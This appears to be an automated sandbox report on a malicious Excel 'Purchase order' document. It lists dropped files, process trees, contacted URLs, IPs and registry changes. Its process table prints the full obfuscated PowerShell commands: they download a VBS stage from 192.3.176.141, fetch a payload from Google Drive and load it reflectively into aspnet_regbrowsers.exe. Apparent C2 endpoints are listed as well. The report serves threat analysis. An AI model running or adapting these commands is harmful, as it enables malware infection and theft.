Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
Purchase order.xls
|
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application:
Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Fri Oct 25 05:30:22 2024, Security: 1
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\greatthingswithgoodnewsgivenbygodthingsgreat[1].hta
|
HTML document, ASCII text, with very long lines (65520), with CRLF line terminators
|
modified
|
|
|
|
C:\Users\user\AppData\Local\Temp\lwndurzh\lwndurzh.cmdline
|
Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\simplethingswithgreatthignsgivenmebest.vbS
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
|
|
|
C:\Users\user\Desktop\Purchase order.xls (copy)
|
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application:
Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Fri Oct 25 18:51:02 2024, Security: 1
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\simplethingswithgreatthignsgivenmebestthings[1].tiff
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\simplethingswithgreatthignsgivenmebestthings[2].tiff
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\655DB7B3.emf
|
Windows Enhanced Metafile (EMF) image data version 0x10000
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6D6EA618.emf
|
Windows Enhanced Metafile (EMF) image data version 0x10000
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7F15ABE6.emf
|
Windows Enhanced Metafile (EMF) image data version 0x10000
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\90038BFA.emf
|
Windows Enhanced Metafile (EMF) image data version 0x10000
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\92B84E9D.emf
|
Windows Enhanced Metafile (EMF) image data version 0x10000
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D35A1E0C.emf
|
Windows Enhanced Metafile (EMF) image data version 0x10000
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\1f4gqch3.yb0.ps1
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\1xjhsaca.ejy.psm1
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\3w1sxmqs\3w1sxmqs.0.cs
|
C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (357)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\3w1sxmqs\3w1sxmqs.cmdline
|
Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\3w1sxmqs\3w1sxmqs.dll
|
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\3w1sxmqs\3w1sxmqs.out
|
Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
|
modified
|
||
|
C:\Users\user\AppData\Local\Temp\3w1sxmqs\CSC4FC5C9177C1B495AB64B9617174E2B9E.TMP
|
MSVC .res
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\5fjqud0c.jvz.psm1
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\RES7AEA.tmp
|
Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Fri Oct 25 17:51:06 2024,
1st section name ".debug$S"
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\RES9251.tmp
|
Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Fri Oct 25 17:51:12 2024,
1st section name ".debug$S"
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\c4uo25w2.23k.ps1
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\cj5x5cuz.uy5.ps1
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\cxperjly.vas.ps1
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\lwndurzh\CSCC4D24F44B33B435588447526C34E647.TMP
|
MSVC .res
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\lwndurzh\lwndurzh.0.cs
|
C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (357)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\lwndurzh\lwndurzh.dll
|
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\lwndurzh\lwndurzh.out
|
Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
|
modified
|
||
|
C:\Users\user\AppData\Local\Temp\mg20lqoj.r4c.ps1
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\mogcvflq.4gp.psm1
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\v3dqwrfp.hjg.psm1
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\vigjsfpz.0ft.psm1
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\w2ilyone.qv5.ps1
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\xqzu2zun.dfy.psm1
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\~DF2695108681295A60.TMP
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\~DF48F43F245FA812AF.TMP
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\~DF5CF548D4DA5D9F14.TMP
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\CF97F5\5879F5.lck
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-966771315-3019405637-367336477-1006\f554348b930ff81505ce47f7c6b7d232_ea860e7a-a87f-4a88-92ef-38f744458171
|
data
|
dropped
|
||
|
C:\Users\user\Desktop\23530000
|
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application:
Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Fri Oct 25 18:51:02 2024, Security: 1
|
dropped
|
||
|
C:\Users\user\Desktop\23530000:Zone.Identifier
|
ASCII text, with CRLF line terminators
|
dropped
|
There are 35 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
|
"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
|
|
|
|
C:\Windows\System32\mshta.exe
|
C:\Windows\System32\mshta.exe -Embedding
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\SysTEM32\winDOWspOWERSheLL\v1.0\pOweRSheLl.ExE" "poWERShELl -Ex
bYPAss -NOP -w 1
-C DEVICECrEDENtiaLDEPloymenT.EXe ;
IeX($(iEx('[syStem.TeXt.enCOdIng]'+[ChAr]58+[ChAr]0x3A+'utF8.geTStRiNg([SySTeM.cOnveRt]'+[CHar]0x3a+[ChAR]58+'FROMBASE64sTRINg('+[cHaR]34+'JExBTmYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhRGQtVFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtYmVyZEVmaU5pVElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJsbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBidEdsVWpzLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjRFNGWUcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVEYWNZeVRZWUNRLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQmtab0UsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFqUXRiYXVIcWJUKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJVYlRicGlLZSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWVTcEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBEWlZyQVJNZFdhaCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRMQU5mOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTc2LjE0MS80MS9zaW1wbGV0aGluZ3N3aXRoZ3JlYXR0aGlnbnNnaXZlbm1lYmVzdHRoaW5ncy50SUYiLCIkRU52OkFQUERBVEFcc2ltcGxldGhpbmdzd2l0aGdyZWF0dGhpZ25zZ2l2ZW5tZWJlc3QudmJTIiwwLDApO1N0YVJ0LVNMZUVQKDMpO3N0YXJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcc2ltcGxldGhpbmdzd2l0aGdyZWF0dGhpZ25zZ2l2ZW5tZWJlc3QudmJTIg=='+[Char]34+'))')))"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex bYPAss -NOP -w 1 -C DEVICECrEDENtiaLDEPloymenT.EXe
|
|
|
|
C:\Windows\System32\mshta.exe
|
C:\Windows\System32\mshta.exe -Embedding
|
|
|
|
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
|
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lwndurzh\lwndurzh.cmdline"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\SysTEM32\winDOWspOWERSheLL\v1.0\pOweRSheLl.ExE" "poWERShELl -Ex
bYPAss -NOP -w 1
-C DEVICECrEDENtiaLDEPloymenT.EXe ;
IeX($(iEx('[syStem.TeXt.enCOdIng]'+[ChAr]58+[ChAr]0x3A+'utF8.geTStRiNg([SySTeM.cOnveRt]'+[CHar]0x3a+[ChAR]58+'FROMBASE64sTRINg('+[cHaR]34+'JExBTmYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhRGQtVFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtYmVyZEVmaU5pVElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJsbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBidEdsVWpzLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjRFNGWUcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVEYWNZeVRZWUNRLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQmtab0UsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFqUXRiYXVIcWJUKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJVYlRicGlLZSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWVTcEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBEWlZyQVJNZFdhaCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRMQU5mOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTc2LjE0MS80MS9zaW1wbGV0aGluZ3N3aXRoZ3JlYXR0aGlnbnNnaXZlbm1lYmVzdHRoaW5ncy50SUYiLCIkRU52OkFQUERBVEFcc2ltcGxldGhpbmdzd2l0aGdyZWF0dGhpZ25zZ2l2ZW5tZWJlc3QudmJTIiwwLDApO1N0YVJ0LVNMZUVQKDMpO3N0YXJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcc2ltcGxldGhpbmdzd2l0aGdyZWF0dGhpZ25zZ2l2ZW5tZWJlc3QudmJTIg=='+[Char]34+'))')))"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex bYPAss -NOP -w 1 -C DEVICECrEDENtiaLDEPloymenT.EXe
|
|
|
|
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
|
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3w1sxmqs\3w1sxmqs.cmdline"
|
|
|
|
C:\Windows\System32\wscript.exe
|
"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\simplethingswithgreatthignsgivenmebest.vbS"
|
|
|
|
C:\Windows\System32\wscript.exe
|
"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\simplethingswithgreatthignsgivenmebest.vbS"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiggJHBTaG9tZVsyMV0rJFBzaE9tZVszMF0rJ3gnKSAoICgoJ3N3UmltYWdlVXJsID0gNWw3JysnaHR0cHM6Ly8nKydkcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjZ2UzRzVU95Ym5ILXNEdlVoQll3dXIgNWw3O3N3UndlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XJysnZWJDbGllbnQ7c3dSaW1hZ2VCeXRlcyA9IHN3UndlYkNsaWVudC5Eb3dubG9hZERhdGEoc3dSaW1hZ2VVcmwpO3N3JysnUmltYWdlVGV4dCA9IFtTeXN0ZW0nKycuVGV4dC5FbmNvZGluZ10nKyc6OlVURjguR2V0U3RyaW5nKHN3UmltYWdlQnl0ZXMpO3N3UnN0YXJ0RmxhZyA9IDVsNzw8QkEnKydTRTY0X1NUQVJUPicrJz41bDc7c3dSZW5kRmxhZyA9IDVsNzw8QkFTRTY0X0VORD4+NWw3O3N3UnMnKyd0YXJ0SW5kZXggPSBzd1JpbWFnZVRleHQuSW5kZXhPZicrJyhzd1JzdGFydEZsYWcpO3N3UmVuZEluZGV4ID0gc3dSaW1hZ2VUJysnZXh0LkluZGV4T2Yoc3dSZW5kRmxhZyk7c3dSc3RhcnRJJysnbmRleCAtZ2UgMCAtYW5kIHMnKyd3UmVuZEluZGV4IC1ndCBzd1JzdGEnKydydEluZGV4O3N3UnN0YXJ0SW5kZXggKz0gc3dSc3RhcnRGbGFnLkxlbmd0aDtzd1JiYXNlNjRMZW5ndGggPSBzd1JlbmRJbmRleCAtIHN3UnN0YXJ0SW5kZXg7c3dSYmFzZTY0Q29tbWFuZCA9IHN3UmltYWdlVGV4dC5TdWJzJysndHJpbmcoc3dSc3RhcnRJbmRleCwgc3dSYmFzZTY0TGVuZ3RoKTtzd1JiYXNlNjRSZXZlcnNlZCA9IC1qbycrJ2luIChzd1JiYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCcrJykgRncxJysnICcrJ0ZvckVhY2gtT2JqZWN0IHsgc3dSXyB9KVstMS4uLShzd1JiYXNlNjRDb21tYW5kLkxlbmd0aCldO3N3UmNvbW1hbmRCeXRlcyA9JysnIFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoc3dSYmFzZTY0UmV2ZXJzZWQpO3N3UmxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChzd1Jjb21tYW5kQnl0ZXMpO3N3UnZhaU1ldGhvZCA9IFtkJysnbmxpYicrJy5JTy5Ib21lXS5HZXRNZXRob2QoNWw3VkFJNWw3KTtzd1J2YWlNZXRob2QuSW52b2tlKHN3Um51bGwsIEAoNWw3dHh0LlRUUkxQTVMvMTQvMTQxLjY3MS4zLjI5MS8vOnB0dGg1bDcsIDVsN2Rlc2F0aXZhZG81bDcsIDVsN2Rlc2F0aXZhZG81bDcsIDVsN2Rlc2F0aXZhZG8nKyc1bDcsICcrJzVsN2FzcG5ldF9yZWdicm93c2VyczVsNywgNWw3ZCcrJ2VzYXRpdmFkbzVsNywgNWw3ZGVzYXRpdmFkbzVsNyw1bDdkZXNhdGl2YWRvNWw3LDVsN2Rlc2F0aXZhZG81bDcsNWw3ZGVzYXRpdmFkbzVsNyw1bDdkZXNhdGl2YWRvNWw3LDVsN2Rlc2F0aXZhZG81bDcsNWw3MTVsNyw1bDdkZXNhdGl2YWRvNWw3KSk7JykgLXJlUExhY0UnNWw3JyxbY0hhcl0zOSAtcmVQTGFjRSAnc3dSJyxbY0hhcl0zNiAgLUNSZXBMQWNlICAnRncxJyxbY0hhcl0xMjQpICk=';$OWjuxd
= [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy
bypass -NoProfile -command $OWjuxD
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command
"&( $pShome[21]+$PshOme[30]+'x') ( (('swRimageUrl = 5l7'+'https://'+'drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur
5l7;swRwebClient = New-Object System.Net.W'+'ebClient;swRimageBytes = swRwebClient.DownloadData(swRimageUrl);sw'+'RimageText
= [System'+'.Text.Encoding]'+'::UTF8.GetString(swRimageBytes);swRstartFlag = 5l7<<BA'+'SE64_START>'+'>5l7;swRendFlag = 5l7<<BASE64_END>>5l7;swRs'+'tartIndex
= swRimageText.IndexOf'+'(swRstartFlag);swRendIndex = swRimageT'+'ext.IndexOf(swRendFlag);swRstartI'+'ndex -ge 0 -and s'+'wRendIndex
-gt swRsta'+'rtIndex;swRstartIndex += swRstartFlag.Length;swRbase64Length = swRendIndex - swRstartIndex;swRbase64Command =
swRimageText.Subs'+'tring(swRstartIndex, swRbase64Length);swRbase64Reversed = -jo'+'in (swRbase64Command.ToCharArray('+')
Fw1'+' '+'ForEach-Object { swR_ })[-1..-(swRbase64Command.Length)];swRcommandBytes ='+' [System.Convert]::FromBase64String(swRbase64Reversed);swRloadedAssembly
= [System.Reflection.Assembly]::Load(swRcommandBytes);swRvaiMethod = [d'+'nlib'+'.IO.Home].GetMethod(5l7VAI5l7);swRvaiMethod.Invoke(swRnull,
@(5l7txt.TTRLPMS/14/141.671.3.291//:ptth5l7, 5l7desativado5l7, 5l7desativado5l7, 5l7desativado'+'5l7, '+'5l7aspnet_regbrowsers5l7,
5l7d'+'esativado5l7, 5l7desativado5l7,5l7desativado5l7,5l7desativado5l7,5l7desativado5l7,5l7desativado5l7,5l7desativado5l7,5l715l7,5l7desativado5l7));')
-rePLacE'5l7',[cHar]39 -rePLacE 'swR',[cHar]36 -CRepLAce 'Fw1',[cHar]124) )"
|
|
|
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
|
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"
|
|
|
|
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
|
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES7AEA.tmp"
"c:\Users\user\AppData\Local\Temp\lwndurzh\CSCC4D24F44B33B435588447526C34E647.TMP"
|
||
|
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
|
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES9251.tmp"
"c:\Users\user\AppData\Local\Temp\3w1sxmqs\CSC4FC5C9177C1B495AB64B9617174E2B9E.TMP"
|
There are 6 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://kbfvzoboss.bid/alien/fre.php
|
|
||
|
http://alphastand.top/alien/fre.php
|
|
||
|
http://alphastand.win/alien/fre.php
|
|
||
|
http://alphastand.trade/alien/fre.php
|
|
||
|
http://192.3.176.141/41/simplethingswithgreatthignsgivenmebestthings.tIF
|
192.3.176.141
|
|
|
|
http://94.156.177.220/simple/five/fre.php
|
94.156.177.220
|
|
|
|
http://192.3.176.141/41/SMPLRTT.txt
|
192.3.176.141
|
|
|
|
94.156.177.220/simple/five/fre.php
|
|
||
|
http://192.3.176.141/41/ce/greatthingswithgoodnewsgivenbygodthingsgreat.hta
|
192.3.176.141
|
|
|
|
https://qrisni.me/
|
unknown
|
||
|
http://192.3.176.141/41/simpleth
|
unknown
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
https://qrisni.me/gtLs6A?&volcano=wet&muscle=chilly&result=salty&perfume=jazzy&knickers=depressed&walk=sloppy&junior=alike&sweatshirt=clammy&puddle
|
188.114.97.3
|
||
|
http://crl.entrust.net/server1.crl0
|
unknown
|
||
|
https://qrisni.me/C
|
unknown
|
||
|
http://192.3.176.141/
|
unknown
|
||
|
http://ocsp.entrust.net03
|
unknown
|
||
|
http://www.ibsensoftware.com/
|
unknown
|
||
|
http://192.3.176.141/41/ce/greatthingswithgoodnewsgivenbygodthingsgreat.hta)-Qo
|
unknown
|
||
|
http://192.3.176.141/41/ce/greatthingswithgoodnewsgivenbygodthingsgreat.hta/
|
unknown
|
||
|
http://192.3.176.141/41/ce/greatthingswithgoodnewsgivenbygodthingsgreat.hta1
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://qrisni.me/Z
|
unknown
|
||
|
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
|
unknown
|
||
|
http://www.diginotar.nl/cps/pkioverheid0
|
unknown
|
||
|
http://192.3.176.141/41/ce/greatthingswithgoodnewsgivenbygodthingsgreat.htaG
|
unknown
|
||
|
http://192.3.176.141/41/ce/greatthingswithgoodnewsgivenbygodthingsgreat.htahttp://192.3.176.141/41/c
|
unknown
|
||
|
http://192.3.176.141/41/ce/greatthingswithgoodnewsgivenbygodthingsgreat.hta:
|
unknown
|
||
|
http://go.micros
|
unknown
|
||
|
https://qrisni.me/gtLs6A?&volcano=wet&muscle=chilly&result=salty&perfume=jazzy&knickers=depressed&wa
|
unknown
|
||
|
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
|
unknown
|
||
|
http://192.3.176.141/41/ce/greatthingswithgoodnewsgivenbygodthingsgreat.hta...%252525
|
unknown
|
||
|
http://192.3.176.141/41/ce/greatthingswithgoodnewsgivenbygodthingsgreat.htaC:
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://drive.google.com
|
unknown
|
||
|
https://drive.usercontent.google.com
|
unknown
|
||
|
http://192.3.176.141/41/simplethingswithgreatthignsgivenmebestthings.tIF89
|
unknown
|
||
|
http://192.3.176.141/41/ce/greatthingswithgoodnewsgivenbygodthingsgreat.hta...
|
unknown
|
||
|
https://qrisni.me/1;
|
unknown
|
||
|
http://ocsp.entrust.net0D
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://secure.comodo.com/CPS0
|
unknown
|
||
|
http://192.3.176.141/41/simplethingswithgreatthignsgivenmebestthings.tIFp
|
unknown
|
||
|
http://192.3.176.141/h
|
unknown
|
||
|
http://crl.entrust.net/2048ca.crl0
|
unknown
|
||
|
http://go.cr
|
unknown
|
There are 38 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
qrisni.me
|
188.114.97.3
|
||
|
drive.google.com
|
142.250.186.46
|
||
|
drive.usercontent.google.com
|
142.250.186.161
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
192.3.176.141
|
unknown
|
United States
|
|
|
|
94.156.177.220
|
unknown
|
Bulgaria
|
|
|
|
142.250.186.46
|
drive.google.com
|
United States
|
||
|
188.114.97.3
|
qrisni.me
|
European Union
|
||
|
142.250.186.161
|
drive.usercontent.google.com
|
United States
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
|
Blob
|
|
|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
|
Blob
|
|
|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
|
Blob
|
|
|
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
|
`<0
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
|
2060
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
|
1036
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Outlook\Journaling\Microsoft Excel
|
Enabled
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel
|
MTTT
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\ReviewCycle
|
ReviewToken
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\2B75D
|
2B75D
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
|
$#0
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Place MRU
|
Max Display
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Max Display
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 1
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 2
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 3
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 4
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 5
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 6
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 7
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 8
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 9
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 10
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 11
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 12
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 13
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 14
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
